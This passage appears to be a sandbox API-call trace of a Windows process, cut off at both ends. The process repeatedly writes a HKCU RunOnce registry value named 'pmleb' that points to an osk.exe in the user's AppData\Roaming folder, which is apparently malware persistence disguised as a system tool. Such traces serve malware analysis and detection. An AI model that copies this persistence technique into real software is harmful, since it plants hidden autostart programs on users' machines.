lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.843] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.843] RegCloseKey (hKey=0x280) returned 0x0 [0082.843] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.843] SetTimer (hWnd=0x20280, nIDEvent=0x210a, uElapse=0xa, lpTimerFunc=0x0) returned 0x210a [0082.843] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.857] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.857] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.858] KillTimer (hWnd=0x20280, uIDEvent=0x210a) returned 1 [0082.858] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0082.858] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.858] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.858] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.859] RegCloseKey (hKey=0x280) returned 0x0 [0082.859] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.859] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.859] SetTimer (hWnd=0x20280, nIDEvent=0x210b, uElapse=0xa, lpTimerFunc=0x0) returned 0x210b [0082.859] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.873] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.873] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.873] KillTimer (hWnd=0x20280, uIDEvent=0x210b) returned 1 [0082.873] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.873] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.874] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.874] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.874] RegCloseKey (hKey=0x280) returned 0x0 
[0082.874] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.874] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.874] SetTimer (hWnd=0x20280, nIDEvent=0x210c, uElapse=0xa, lpTimerFunc=0x0) returned 0x210c [0082.874] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.888] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.888] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.888] KillTimer (hWnd=0x20280, uIDEvent=0x210c) returned 1 [0082.889] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.889] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.889] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.889] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.890] RegCloseKey (hKey=0x280) returned 0x0 [0082.890] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.890] SetTimer (hWnd=0x20280, nIDEvent=0x210d, uElapse=0xa, lpTimerFunc=0x0) returned 0x210d [0082.890] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.904] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.904] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.905] KillTimer (hWnd=0x20280, uIDEvent=0x210d) returned 1 [0082.905] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.905] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.905] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.906] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.906] RegCloseKey (hKey=0x280) returned 0x0 [0082.906] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.906] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.906] SetTimer (hWnd=0x20280, nIDEvent=0x210e, uElapse=0xa, lpTimerFunc=0x0) returned 0x210e [0082.906] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.920] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.920] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.920] KillTimer (hWnd=0x20280, uIDEvent=0x210e) returned 1 [0082.920] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.920] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.921] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.921] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.921] RegCloseKey (hKey=0x280) returned 0x0 [0082.921] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.921] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.921] SetTimer (hWnd=0x20280, nIDEvent=0x210f, uElapse=0xa, lpTimerFunc=0x0) returned 0x210f [0082.921] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.935] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.935] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.935] KillTimer (hWnd=0x20280, uIDEvent=0x210f) returned 1 [0082.936] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.936] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.936] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.936] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.936] RegCloseKey (hKey=0x280) returned 0x0 [0082.936] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.937] SetTimer (hWnd=0x20280, nIDEvent=0x2110, uElapse=0xa, lpTimerFunc=0x0) returned 0x2110 [0082.937] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.951] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.951] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.951] KillTimer (hWnd=0x20280, uIDEvent=0x2110) returned 1 [0082.951] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.952] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.952] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.952] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.952] RegCloseKey (hKey=0x280) returned 0x0 [0082.952] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.952] SetTimer (hWnd=0x20280, nIDEvent=0x2111, uElapse=0xa, lpTimerFunc=0x0) returned 0x2111 [0082.952] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.966] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.966] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.966] KillTimer (hWnd=0x20280, uIDEvent=0x2111) returned 1 [0082.967] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.967] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.967] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.967] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.968] RegCloseKey (hKey=0x280) returned 0x0 [0082.968] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0082.968] SetTimer (hWnd=0x20280, nIDEvent=0x2112, uElapse=0xa, lpTimerFunc=0x0) returned 0x2112 [0082.968] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.982] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.982] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.982] KillTimer (hWnd=0x20280, uIDEvent=0x2112) returned 1 [0082.982] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.983] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.983] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.983] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.983] RegCloseKey (hKey=0x280) returned 0x0 [0082.983] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.983] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.983] SetTimer (hWnd=0x20280, nIDEvent=0x2113, uElapse=0xa, lpTimerFunc=0x0) returned 0x2113 [0082.984] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.997] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.997] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.998] KillTimer (hWnd=0x20280, uIDEvent=0x2113) returned 1 [0082.998] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.998] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.998] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.998] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.999] RegCloseKey (hKey=0x280) returned 0x0 [0082.999] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.999] SetTimer (hWnd=0x20280, nIDEvent=0x2114, uElapse=0xa, lpTimerFunc=0x0) returned 0x2114 [0082.999] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.014] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.014] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.014] KillTimer (hWnd=0x20280, uIDEvent=0x2114) returned 1 [0083.014] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.015] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.015] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.015] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.015] RegCloseKey (hKey=0x280) returned 0x0 [0083.015] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.015] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.015] SetTimer (hWnd=0x20280, nIDEvent=0x2115, uElapse=0xa, lpTimerFunc=0x0) returned 0x2115 
[0083.015] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.029] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.029] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.029] KillTimer (hWnd=0x20280, uIDEvent=0x2115) returned 1 [0083.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.030] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.030] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.030] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.030] RegCloseKey (hKey=0x280) returned 0x0 [0083.030] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.030] SetTimer (hWnd=0x20280, nIDEvent=0x2116, uElapse=0xa, lpTimerFunc=0x0) returned 0x2116 [0083.030] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.044] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.044] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.044] KillTimer (hWnd=0x20280, uIDEvent=0x2116) returned 1 [0083.045] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.045] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.045] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.045] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.046] RegCloseKey (hKey=0x280) returned 0x0 [0083.046] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.046] SetTimer (hWnd=0x20280, nIDEvent=0x2117, uElapse=0xa, lpTimerFunc=0x0) returned 0x2117 [0083.046] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.061] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.061] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.061] KillTimer (hWnd=0x20280, uIDEvent=0x2117) returned 1 [0083.061] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.062] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.062] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.062] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.062] RegCloseKey (hKey=0x280) returned 0x0 [0083.063] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.063] SetTimer (hWnd=0x20280, nIDEvent=0x2118, uElapse=0xa, lpTimerFunc=0x0) returned 0x2118 [0083.063] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0083.075] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.075] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.076] KillTimer (hWnd=0x20280, uIDEvent=0x2118) returned 1 [0083.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.076] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.076] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.077] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.077] RegCloseKey (hKey=0x280) returned 0x0 [0083.077] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.077] SetTimer (hWnd=0x20280, nIDEvent=0x2119, uElapse=0xa, lpTimerFunc=0x0) returned 0x2119 [0083.077] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.091] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.091] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.091] KillTimer (hWnd=0x20280, uIDEvent=0x2119) returned 1 [0083.092] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.092] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.092] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.092] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.092] RegCloseKey (hKey=0x280) returned 0x0 [0083.093] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.093] SetTimer (hWnd=0x20280, nIDEvent=0x211a, uElapse=0xa, lpTimerFunc=0x0) returned 0x211a [0083.093] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.107] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.107] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.107] KillTimer (hWnd=0x20280, uIDEvent=0x211a) returned 1 [0083.107] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.108] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.108] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.108] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.108] RegCloseKey (hKey=0x280) returned 0x0 [0083.108] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.108] SetTimer (hWnd=0x20280, nIDEvent=0x211b, uElapse=0xa, lpTimerFunc=0x0) returned 0x211b [0083.109] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.123] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.123] KillTimer (hWnd=0x20280, uIDEvent=0x211b) returned 1 [0083.123] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.124] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.124] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.124] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.124] RegCloseKey (hKey=0x280) returned 0x0 [0083.125] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.125] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.125] SetTimer (hWnd=0x20280, nIDEvent=0x211c, uElapse=0xa, lpTimerFunc=0x0) returned 0x211c [0083.125] GetMessageW (in: lpMsg=0x33f7fc, 